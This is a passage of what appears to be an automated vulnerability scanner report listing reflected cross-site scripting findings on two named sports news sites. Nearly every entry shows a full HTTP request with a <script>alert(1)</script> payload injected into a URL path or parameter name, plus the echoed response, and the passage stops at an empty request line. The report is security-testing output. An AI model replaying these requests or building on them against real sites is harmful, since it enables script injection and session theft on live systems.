GET /12/17/10/Bears-to-practice-at-Nortwestern-to-prep/landing_insider_john_moon_mullin.html9a563<script>alert(1)</script>f1f018dae53 HTTP/1.1 Host: www.csnchicago.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:28 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:28 GMT Content-Length: 841 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/17/10/Bears-to-practice-at-Nortwestern-to-prep/landing_insider_john_moon_mullin.html9a563<script>alert(1)</script>f1f018dae53"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 20105<script>alert(1)</script>674560a4d25 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/Greinke-Can-Block-Trade-to-15-Teams/landing_word_baseball.html20105<script>alert(1)</script>674560a4d25 HTTP/1.1 Host: www.csnchicago.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:13 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:13 GMT Content-Length: 825 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/17/10/Greinke-Can-Block-Trade-to-15-Teams/landing_word_baseball.html20105<script>alert(1)</script>674560a4d25"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 243ce<script>alert(1)</script>b64ca077b1d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/Hawks-honor-Chris-Chelios-on-heritage-ni/landing_insider_tracey_myers.html243ce<script>alert(1)</script>b64ca077b1d HTTP/1.1 Host: www.csnchicago.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:12 GMT Content-Length: 837 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/17/10/Hawks-honor-Chris-Chelios-on-heritage-ni/landing_insider_tracey_myers.html243ce<script>alert(1)</script>b64ca077b1d"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 62f73<script>alert(1)</script>c101dced0fc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.html62f73<script>alert(1)</script>c101dced0fc HTTP/1.1 Host: www.csnchicago.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:15 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:15 GMT Content-Length: 814 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.html62f73<script>alert(1)</script>c101dced0fc"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 25792<script>alert(1)</script>95de3cccb23 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html25792<script>alert(1)</script>95de3cccb23 HTTP/1.1 Host: www.csnchicago.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:13 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:13 GMT Content-Length: 816 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html25792<script>alert(1)</script>95de3cccb23"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 53ce8<script>alert(1)</script>723e438eb6a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html53ce8<script>alert(1)</script>723e438eb6a HTTP/1.1 Host: www.csnchicago.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:15 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:15 GMT Content-Length: 816 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html53ce8<script>alert(1)</script>723e438eb6a"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 890f3<script>alert(1)</script>30c2dcc9195 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common890f3<script>alert(1)</script>30c2dcc9195/global_flash/player/player.php HTTP/1.1 Host: www.csnchicago.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:09 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:09 GMT Content-Length: 791 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common890f3<script>alert(1)</script>30c2dcc9195/global_flash/player/player.php"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4ffa0<script>alert(1)</script>ed79340cb56 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/global_flash4ffa0<script>alert(1)</script>ed79340cb56/player/player.php HTTP/1.1 Host: www.csnchicago.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:09 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:09 GMT Content-Length: 791 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/global_flash4ffa0<script>alert(1)</script>ed79340cb56/player/player.php"</strong> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 12087<script>alert(1)</script>97d28fbeadd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/global_flash/player12087<script>alert(1)</script>97d28fbeadd/player.php HTTP/1.1 Host: www.csnchicago.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:09 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:09 GMT Content-Length: 791 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/global_flash/player12087<script>alert(1)</script>97d28fbeadd/player.php"</strong> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 45acb<script>alert(1)</script>0a509351314 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/global_flash/player/player.php45acb<script>alert(1)</script>0a509351314 HTTP/1.1 Host: www.csnchicago.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:10 GMT Content-Length: 791 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/global_flash/player/player.php45acb<script>alert(1)</script>0a509351314"</strong> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 35984<script>alert(1)</script>1a5e9f78bd3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/js/35984<script>alert(1)</script>1a5e9f78bd3 HTTP/1.1 Host: www.csnchicago.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:18 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:18 GMT Content-Length: 764 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/js/35984<script>alert(1)</script>1a5e9f78bd3"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ddf4b<script>alert(1)</script>ce17d6abda2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagesddf4b<script>alert(1)</script>ce17d6abda2/video HTTP/1.1 Host: www.csnchicago.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:21 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:21 GMT Content-Length: 765 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/pagesddf4b<script>alert(1)</script>ce17d6abda2/video"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload aa09c<script>alert(1)</script>73e8f648bdb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pages/videoaa09c<script>alert(1)</script>73e8f648bdb HTTP/1.1 Host: www.csnchicago.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;
Response (redirected)
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:22 GMT Content-Length: 784 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/404.html?p=/pages/videoaa09c<script>alert(1)</script>73e8f648bdb"</strong> ...[SNIP]...
2.325. http://www.csnchicago.com/pages/video [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csnchicago.com
Path:
/pages/video
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b3ee"><script>alert(1)</script>9e4828c59e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages/video?6b3ee"><script>alert(1)</script>9e4828c59e6=1 HTTP/1.1 Host: www.csnchicago.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 67847 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:21 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:21 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="6b3ee"><script>alert(1)</script>9e4828c59e6" id = "6b3ee"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4a71f<script>alert(1)</script>2887b9b00bd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/16/10/Mom-Theyre-picking-on-Curran/v1_landing.html4a71f<script>alert(1)</script>2887b9b00bd HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:38 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:38 GMT Content-Length: 797 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/16/10/Mom-Theyre-picking-on-Curran/v1_landing.html4a71f<script>alert(1)</script>2887b9b00bd"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d17d2<script>alert(1)</script>f9289778c74 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/16/10/NFL-Picks-Week-15/landing_insider_levine.htmld17d2<script>alert(1)</script>f9289778c74 HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:21 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:21 GMT Content-Length: 798 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/16/10/NFL-Picks-Week-15/landing_insider_levine.htmld17d2<script>alert(1)</script>f9289778c74"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d901d<script>alert(1)</script>208d2f1091e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/16/10/Patriots-dont-let-injuries-stop-them/landing_patriots.htmld901d<script>alert(1)</script>208d2f1091e HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:24 GMT Content-Length: 811 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/16/10/Patriots-dont-let-injuries-stop-them/landing_patriots.htmld901d<script>alert(1)</script>208d2f1091e"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f51b3<script>alert(1)</script>ceb771a37f8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/16/10/Same-old-same-old/landing_heyfelger.htmlf51b3<script>alert(1)</script>ceb771a37f8 HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:27 GMT Content-Length: 793 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/16/10/Same-old-same-old/landing_heyfelger.htmlf51b3<script>alert(1)</script>ceb771a37f8"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2468a<script>alert(1)</script>197191a820e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/16/10/The-un-firing-of-Brian-Cashman/v1_landing.html2468a<script>alert(1)</script>197191a820e HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:25 GMT Content-Length: 799 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/16/10/The-un-firing-of-Brian-Cashman/v1_landing.html2468a<script>alert(1)</script>197191a820e"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1dc77<script>alert(1)</script>063063ef963 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
